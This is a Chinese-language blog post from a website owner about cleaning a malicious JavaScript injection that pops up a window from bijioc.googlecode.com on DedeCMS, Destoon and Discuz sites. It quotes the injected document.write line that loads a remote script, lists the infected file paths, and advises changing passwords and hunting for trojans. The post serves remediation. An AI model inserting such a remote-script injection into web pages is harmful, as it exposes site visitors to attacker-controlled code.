[原创]网站被恶意弹出bijioc.googlecode.com注入解决办法

baacloud免费翻墙vpn注册使用

刚刚发现自己的网站访问时,总是提示弹出一个SVN的窗口

上面的地址是 http://bijioc.googlecode.com/

看来是被恶意js注入了,

目前网站用的是dedecms,destoon的程序,于是百度一下,发现中招的还不少

原来是被在引用的js文件中注入了如下代码:

document.write(unescape("%3Cscript src='http://bijioc.googlecode.com/svn/trunk/js/navigatenormal.js?v="+(new Date().toDateString().replace(/\s/g, ''))+".js' type='text/javascript'%3E%3C/script%3E"));

下面说下我清理过程,首先还是打开我们网站的主页,依然是弹出那个可恶的窗口,关闭,然后用查看下网页源码没有发现异常,那是因为这段代码是利用js输出的,需要查看生成后的最终代码,可以利用firefox中的web developer插件中查看源代码中的查看处理后的源码项,就发现居然在头部引用了一个如下格式的js脚本:

<script type="text/javascript" src="static/js/common.js?9VJ"/>
<script type="text/javascript" src="static/js/common.js?9VJ">// <![CDATA[
<script type="text/javascript" src="http://bijioc.googlecode.com/svn/trunk/js/navigatebbs.js?v=WedFeb292012.js"/>

接下来就是查找被注入的js文件是哪个了,以上面的为例就是common.js文件了,以此类推,依次排查有问题的网站页面源码,只要寻找生成后的页面代码中存在bijioc.googlecode.com前面的js文件修改就行了,为了方便大家总结下我的网站被注入的dedecms的js路径是 /站点根目录/include/dedeajax2.js ;destoon的js路径是/站点目录/file/script/common.js; discuz的js路径/站点目录/static/js/common.js;

最后还要提醒大家及时修改ftp的密码和数据库密码,同时排查空间中是不是有木马程序,因为既然js文件被人修改说明网站的密码已经被人破解,能够上场文件了,一定存在木马,要彻底清查。

赞(0) 打赏
分享到: 更多 (0)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏